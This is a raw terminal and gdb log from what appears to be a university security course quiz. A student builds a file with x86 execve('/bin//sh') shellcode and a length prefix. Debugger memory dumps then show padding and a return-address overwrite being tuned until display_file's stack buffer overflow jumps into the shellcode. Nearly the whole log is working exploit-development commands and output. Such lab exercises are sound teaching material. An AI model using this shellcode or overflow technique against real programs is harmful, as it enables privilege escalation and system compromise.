103ws11:/home/students/cs/2022/rchrys03/EPL326/QUIZ3>printf "45 \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80" > ./file
103ws11:/home/students/cs/2022/rchrys03/EPL326/QUIZ3>cat file
45 1 Ph//shh/bin  1 1Ұ
                      103ws11:/home/students/cs/2022/rchrys03/EPL326/QUIZ3>chmod +x bin.1
103ws11:/home/students/cs/2022/rchrys03/EPL326/QUIZ3>chmod +x bin.2
103ws11:/home/students/cs/2022/rchrys03/EPL326/QUIZ3>chmod +x file
103ws11:/home/students/cs/2022/rchrys03/EPL326/QUIZ3>./run.sh
-sh-4.2$ gdb bin.1
GNU gdb (GDB) Red Hat Enterprise Linux 7.6.1-120.el7
Copyright (C) 2013 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-redhat-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/students/cs/2022/rchrys03/EPL326/QUIZ3/bin.1...(no debugging symbols found)...done.
warning: File "/home/students/cs/2022/rchrys03/EPL326/QUIZ3/.gdbinit" auto-loading has been declined by your `auto-load safe-path' set to "$debugdir:$datadir/auto-load:/usr/bin/mono-gdb.py".
To enable execution of this file add
	add-auto-load-safe-path /home/students/cs/2022/rchrys03/EPL326/QUIZ3/.gdbinit
line to your configuration file "$HOME/.gdbinit".
To completely disable this security protection add
	set auto-load safe-path /
line to your configuration file "$HOME/.gdbinit".
For more information about this security protection see the
"Auto-loading safe path" section in the GDB manual.  E.g., run from the shell:
	info "(gdb)Auto-loading safe path"
(gdb) b main
Breakpoint 1 at 0x80488c3
(gdb) disas
No frame selected.
(gdb) disas main
Dump of assembler code for function main:
   0x080488b3 <+0>:	lea    0x4(%esp),%ecx
   0x080488b7 <+4>:	and    $0xfffffff0,%esp
   0x080488ba <+7>:	pushl  -0x4(%ecx)
   0x080488bd <+10>:	push   %ebp
   0x080488be <+11>:	mov    %esp,%ebp
   0x080488c0 <+13>:	push   %esi
   0x080488c1 <+14>:	push   %ebx
   0x080488c2 <+15>:	push   %ecx
   0x080488c3 <+16>:	sub    $0x2c,%esp
   0x080488c6 <+19>:	mov    %ecx,%ebx
   0x080488c8 <+21>:	mov    (%ebx),%eax
   0x080488ca <+23>:	cmp    $0x1,%eax
   0x080488cd <+26>:	jne    0x80488db <main+40>
   0x080488cf <+28>:	movl   $0x1,(%esp)
   0x080488d6 <+35>:	call   0x8048560 <exit@plt>
   0x080488db <+40>:	call   0x8048520 <getuid@plt>
   0x080488e0 <+45>:	mov    %eax,0x804a054
   0x080488e5 <+50>:	movl   $0x8048a6a,(%esp)
   0x080488ec <+57>:	call   0x8048540 <getenv@plt>
   0x080488f1 <+62>:	mov    %eax,-0x1c(%ebp)
   0x080488f4 <+65>:	cmpl   $0x0,-0x1c(%ebp)
   0x080488f8 <+69>:	je     0x804890a <main+87>
   0x080488fa <+71>:	mov    -0x1c(%ebp),%eax
   0x080488fd <+74>:	mov    %eax,(%esp)
   0x08048900 <+77>:	call   0x80485c0 <atoi@plt>
   0x08048905 <+82>:	mov    %eax,0x804a054
   0x0804890a <+87>:	mov    %ebx,(%esp)
   0x0804890d <+90>:	call   0x80486ed <rnd_env>
   0x08048912 <+95>:	lea    0xf(%eax),%edx
   0x08048915 <+98>:	mov    $0x10,%eax
   0x0804891a <+103>:	sub    $0x1,%eax
   0x0804891d <+106>:	add    %edx,%eax
   0x0804891f <+108>:	mov    $0x10,%esi
   0x08048924 <+113>:	mov    $0x0,%edx
   0x08048929 <+118>:	div    %esi
   0x0804892b <+120>:	imul   $0x10,%eax,%eax
   0x0804892e <+123>:	sub    %eax,%esp
   0x08048930 <+125>:	mov    0x4(%ebx),%eax
   0x08048933 <+128>:	add    $0x4,%eax
   0x08048936 <+131>:	mov    (%eax),%eax
   0x08048938 <+133>:	mov    %eax,(%esp)
   0x0804893b <+136>:	call   0x8048764 <display_file>
   0x08048940 <+141>:	call   0x804889d <root_menu>
   0x08048945 <+146>:	mov    $0x1,%eax
   0x0804894a <+151>:	lea    -0xc(%ebp),%esp
   0x0804894d <+154>:	pop    %ecx
   0x0804894e <+155>:	pop    %ebx
   0x0804894f <+156>:	pop    %esi
   0x08048950 <+157>:	pop    %ebp
   0x08048951 <+158>:	lea    -0x4(%ecx),%esp
---Type <return> to continue, or q <return> to quit---
   0x08048954 <+161>:	ret    
End of assembler dump.
(gdb) b ^CQuit   
(gdb) b display_file
Breakpoint 2 at 0x8048768
(gdb) r file
Starting program: /home/students/cs/2022/rchrys03/EPL326/QUIZ3/bin.1 file

Breakpoint 1, 0x080488c3 in main ()
Missing separate debuginfos, use: debuginfo-install glibc-2.17-326.el7_9.i686
(gdb) c
Continuing.

Breakpoint 2, 0x08048768 in display_file ()
(gdb) disas
Dump of assembler code for function display_file:
   0x08048764 <+0>:	push   %ebp
   0x08048765 <+1>:	mov    %esp,%ebp
   0x08048767 <+3>:	push   %ebx
=> 0x08048768 <+4>:	sub    $0x44,%esp
   0x0804876b <+7>:	movl   $0x8048a1e,0x4(%esp)
   0x08048773 <+15>:	mov    0x8(%ebp),%eax
   0x08048776 <+18>:	mov    %eax,(%esp)
   0x08048779 <+21>:	call   0x8048590 <fopen@plt>
   0x0804877e <+26>:	mov    %eax,-0x10(%ebp)
   0x08048781 <+29>:	movl   $0x0,-0xc(%ebp)
   0x08048788 <+36>:	movl   $0x0,-0x34(%ebp)
   0x0804878f <+43>:	lea    -0x34(%ebp),%eax
   0x08048792 <+46>:	mov    %eax,0x8(%esp)
   0x08048796 <+50>:	movl   $0x8048a20,0x4(%esp)
   0x0804879e <+58>:	mov    -0x10(%ebp),%eax
   0x080487a1 <+61>:	mov    %eax,(%esp)
   0x080487a4 <+64>:	call   0x8048500 <__isoc99_fscanf@plt>
   0x080487a9 <+69>:	cmp    $0x1,%eax
   0x080487ac <+72>:	jne    0x804886a <display_file+262>
   0x080487b2 <+78>:	mov    -0x34(%ebp),%eax
   0x080487b5 <+81>:	mov    %eax,(%esp)
   0x080487b8 <+84>:	call   0x8048550 <malloc@plt>
   0x080487bd <+89>:	mov    %eax,-0x14(%ebp)
   0x080487c0 <+92>:	movl   $0x0,-0xc(%ebp)
   0x080487c7 <+99>:	jmp    0x80487e3 <display_file+127>
   0x080487c9 <+101>:	mov    -0xc(%ebp),%eax
   0x080487cc <+104>:	mov    -0x14(%ebp),%edx
   0x080487cf <+107>:	lea    (%edx,%eax,1),%ebx
   0x080487d2 <+110>:	mov    -0x10(%ebp),%eax
   0x080487d5 <+113>:	mov    %eax,(%esp)
   0x080487d8 <+116>:	call   0x80485a0 <fgetc@plt>
   0x080487dd <+121>:	mov    %al,(%ebx)
   0x080487df <+123>:	addl   $0x1,-0xc(%ebp)
   0x080487e3 <+127>:	mov    -0x34(%ebp),%eax
   0x080487e6 <+130>:	cmp    -0xc(%ebp),%eax
   0x080487e9 <+133>:	ja     0x80487c9 <display_file+101>
   0x080487eb <+135>:	mov    -0x34(%ebp),%eax
   0x080487ee <+138>:	mov    %eax,0x8(%esp)
   0x080487f2 <+142>:	mov    -0x14(%ebp),%eax
   0x080487f5 <+145>:	mov    %eax,0x4(%esp)
   0x080487f9 <+149>:	lea    -0x2e(%ebp),%eax
   0x080487fc <+152>:	mov    %eax,(%esp)
   0x080487ff <+155>:	call   0x8048510 <memcpy@plt>
   0x08048804 <+160>:	mov    -0x34(%ebp),%edx
   0x08048807 <+163>:	mov    0x804a04c,%eax
   0x0804880c <+168>:	mov    %edx,0x8(%esp)
   0x08048810 <+172>:	movl   $0x8048a24,0x4(%esp)
   0x08048818 <+180>:	mov    %eax,(%esp)
   0x0804881b <+183>:	call   0x8048580 <fprintf@plt>
   0x08048820 <+188>:	movl   $0x0,-0xc(%ebp)
---Type <return> to continue, or q <return> to quit---
   0x08048827 <+195>:	jmp    0x804884d <display_file+233>
   0x08048829 <+197>:	mov    0x804a04c,%edx
   0x0804882f <+203>:	lea    -0x2e(%ebp),%ecx
   0x08048832 <+206>:	mov    -0xc(%ebp),%eax
   0x08048835 <+209>:	add    %ecx,%eax
   0x08048837 <+211>:	movzbl (%eax),%eax
   0x0804883a <+214>:	movsbl %al,%eax
   0x0804883d <+217>:	mov    %edx,0x4(%esp)
   0x08048841 <+221>:	mov    %eax,(%esp)
   0x08048844 <+224>:	call   0x80485b0 <fputc@plt>
   0x08048849 <+229>:	addl   $0x1,-0xc(%ebp)
   0x0804884d <+233>:	mov    -0x34(%ebp),%eax
   0x08048850 <+236>:	cmp    -0xc(%ebp),%eax
   0x08048853 <+239>:	ja     0x8048829 <display_file+197>
   0x08048855 <+241>:	mov    0x804a04c,%eax
   0x0804885a <+246>:	mov    %eax,0x4(%esp)
   0x0804885e <+250>:	movl   $0xa,(%esp)
   0x08048865 <+257>:	call   0x80485b0 <fputc@plt>
   0x0804886a <+262>:	add    $0x44,%esp
   0x0804886d <+265>:	pop    %ebx
   0x0804886e <+266>:	pop    %ebp
   0x0804886f <+267>:	ret    
End of assembler dump.
(gdb) b *0x08048804
Breakpoint 3 at 0x8048804
(gdb) c
Continuing.

Breakpoint 3, 0x08048804 in display_file ()
(gdb) x/32x $ebp-32
0xbfffee88:	0x31c931e3	0xcd0bb0d2	0xffffff80	0xffffffff
0xbfffee98:	0xffffffff	0xffffffff	0xffffffff	0xbfffffff
0xbfffeea8:	0xbffff988	0x08048940	0xbffffbb0	0x00000000
0xbfffeeb8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeec8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeed8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeee8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeef8:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) r file
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/students/cs/2022/rchrys03/EPL326/QUIZ3/bin.1 file

Breakpoint 1, 0x080488c3 in main ()
(gdb) c
Continuing.

Breakpoint 2, 0x08048768 in display_file ()
(gdb) c
Continuing.

Breakpoint 3, 0x08048804 in display_file ()
(gdb) x/32x $ebp-32
0xbfffee88:	0x00000000	0x00000000	0x00000000	0x0804b170
0xbfffee98:	0x0804b008	0x00000001	0x00000000	0xbffff9a0
0xbfffeea8:	0xbffff988	0x08048940	0xbffffbb0	0x00000000
0xbfffeeb8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeec8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeed8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeee8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeef8:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) r file       
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/students/cs/2022/rchrys03/EPL326/QUIZ3/bin.1 file

Breakpoint 1, 0x080488c3 in main ()
(gdb) c            
Continuing.

Breakpoint 2, 0x08048768 in display_file ()
(gdb) c
Continuing.

Breakpoint 3, 0x08048804 in display_file ()
(gdb) x/32x $ebp-32
0xbfffee88:	0x00000000	0x00000000	0x00000000	0x0804b170
0xbfffee98:	0x0804b008	0x00000001	0x00000000	0xbffff9a0
0xbfffeea8:	0xbffff988	0x08048940	0xbffffbb0	0x00000000
0xbfffeeb8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeec8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeed8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeee8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeef8:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) c
Continuing.
Rendering record (size: 1):
 
[Inferior 1 (process 19735) exited with code 01]
(gdb) r file       
Starting program: /home/students/cs/2022/rchrys03/EPL326/QUIZ3/bin.1 file

Breakpoint 1, 0x080488c3 in main ()
(gdb) c     
Continuing.

Breakpoint 2, 0x08048768 in display_file ()
(gdb) c
Continuing.

Breakpoint 3, 0x08048804 in display_file ()
(gdb) x/32x $ebp-32
0xbfffee88:	0x00000000	0x00000000	0x00000000	0x0804b170
0xbfffee98:	0x0804b008	0x00000001	0x00000000	0xbffff9a0
0xbfffeea8:	0xbffff988	0x08048940	0xbffffbb0	0x00000000
0xbfffeeb8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeec8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeed8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeee8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeef8:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) r file       
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/students/cs/2022/rchrys03/EPL326/QUIZ3/bin.1 file

Breakpoint 1, 0x080488c3 in main ()
(gdb) c            
Continuing.

Breakpoint 2, 0x08048768 in display_file ()
(gdb) c
Continuing.

Breakpoint 3, 0x08048804 in display_file ()
(gdb) x/32x $ebp-32
0xbfffee88:	0x31c931e3	0xcd0bb0d2	0x41414180	0x41414141
0xbfffee98:	0xffffff41	0xffffffff	0xffffffff	0xffffffff
0xbfffeea8:	0xffffffff	0xffffffff	0xbffffbff	0x00000000
0xbfffeeb8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeec8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeed8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeee8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeef8:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) r file       
The program being debugged has been started already.
Start it from the beginning? (y or n) y    

Starting program: /home/students/cs/2022/rchrys03/EPL326/QUIZ3/bin.1 file

Breakpoint 1, 0x080488c3 in main ()
(gdb) c
Continuing.

Breakpoint 2, 0x08048768 in display_file ()
(gdb) c
Continuing.

Breakpoint 3, 0x08048804 in display_file ()
(gdb) x/32x $ebp-32
0xbfffee88:	0x31c931e3	0xcd0bb0d2	0x41414180	0x41414141
0xbfffee98:	0xffffff41	0xffffffff	0xffffffff	0xffffffff
0xbfffeea8:	0xffffffff	0x08048940	0xbffffbb0	0x00000000
0xbfffeeb8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeec8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeed8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeee8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeef8:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) r file       
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/students/cs/2022/rchrys03/EPL326/QUIZ3/bin.1 file

Breakpoint 1, 0x080488c3 in main ()
(gdb) c            
Continuing.

Breakpoint 2, 0x08048768 in display_file ()
(gdb) c     
Continuing.

Breakpoint 3, 0x08048804 in display_file ()
(gdb) x/32x $ebp-32
0xbfffee88:	0x31c931e3	0xcd0bb0d2	0x41414180	0x41414141
0xbfffee98:	0x41414141	0x41414141	0x41414141	0x41414141
0xbfffeea8:	0x41414141	0x08048940	0xbffffbb0	0x00000000
0xbfffeeb8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeec8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeed8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeee8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeef8:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) r file       
The program being debugged has been started already.
Start it from the beginning? (y or n) y       

Starting program: /home/students/cs/2022/rchrys03/EPL326/QUIZ3/bin.1 file

Breakpoint 1, 0x080488c3 in main ()
(gdb) c
Continuing.

Breakpoint 2, 0x08048768 in display_file ()
(gdb) c
Continuing.

Breakpoint 3, 0x08048804 in display_file ()
(gdb) x/32x $ebp-32
0xbfffee88:	0x31c931e3	0xcd0bb0d2	0x41414180	0x41414141
0xbfffee98:	0x41414141	0x41414141	0x41414141	0x41414141
0xbfffeea8:	0x41414141	0x41414141	0xbffffbb0	0x00000000
0xbfffeeb8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeec8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeed8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeee8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeef8:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) x/32x $ebp-62
0xbfffee6a:	0x00000000	0x00000000	0x00360000	0x00000000
0xbfffee7a:	0x6850c031	0x68732f2f	0x69622f68	0x31e3896e
0xbfffee8a:	0xb0d231c9	0x4180cd0b	0x41414141	0x41414141
0xbfffee9a:	0x41414141	0x41414141	0x41414141	0x41414141
0xbfffeeaa:	0x41414141	0xfbb04141	0x0000bfff	0x00000000
0xbfffeeba:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeeca:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeeda:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) r file                                
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/students/cs/2022/rchrys03/EPL326/QUIZ3/bin.1 file

Breakpoint 1, 0x080488c3 in main ()
(gdb) c
Continuing.

Breakpoint 2, 0x08048768 in display_file ()
(gdb) c
Continuing.

Breakpoint 3, 0x08048804 in display_file ()
(gdb) x/32x $ebp-62
0xbfffee6a:	0x00000000	0x00000000	0x00360000	0x00000000
0xbfffee7a:	0x6850c031	0x68732f2f	0x69622f68	0x31e3896e
0xbfffee8a:	0xb0d231c9	0x4180cd0b	0x41414141	0x41414141
0xbfffee9a:	0x41414141	0x41414141	0x41414141	0x41414141
0xbfffeeaa:	0xee7a4141	0xfbb0bfff	0x0000bfff	0x00000000
0xbfffeeba:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeeca:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeeda:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) x/32x $ebp-32
0xbfffee88:	0x31c931e3	0xcd0bb0d2	0x41414180	0x41414141
0xbfffee98:	0x41414141	0x41414141	0x41414141	0x41414141
0xbfffeea8:	0x41414141	0xbfffee7a	0xbffffbb0	0x00000000
0xbfffeeb8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeec8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeed8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeee8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffeef8:	0x00000000	0x00000000	0x00000000	0x00000000
(gdb) ^Z
[1]+  Stopped(SIGTSTP)        gdb bin.1
-sh-4.2$ 
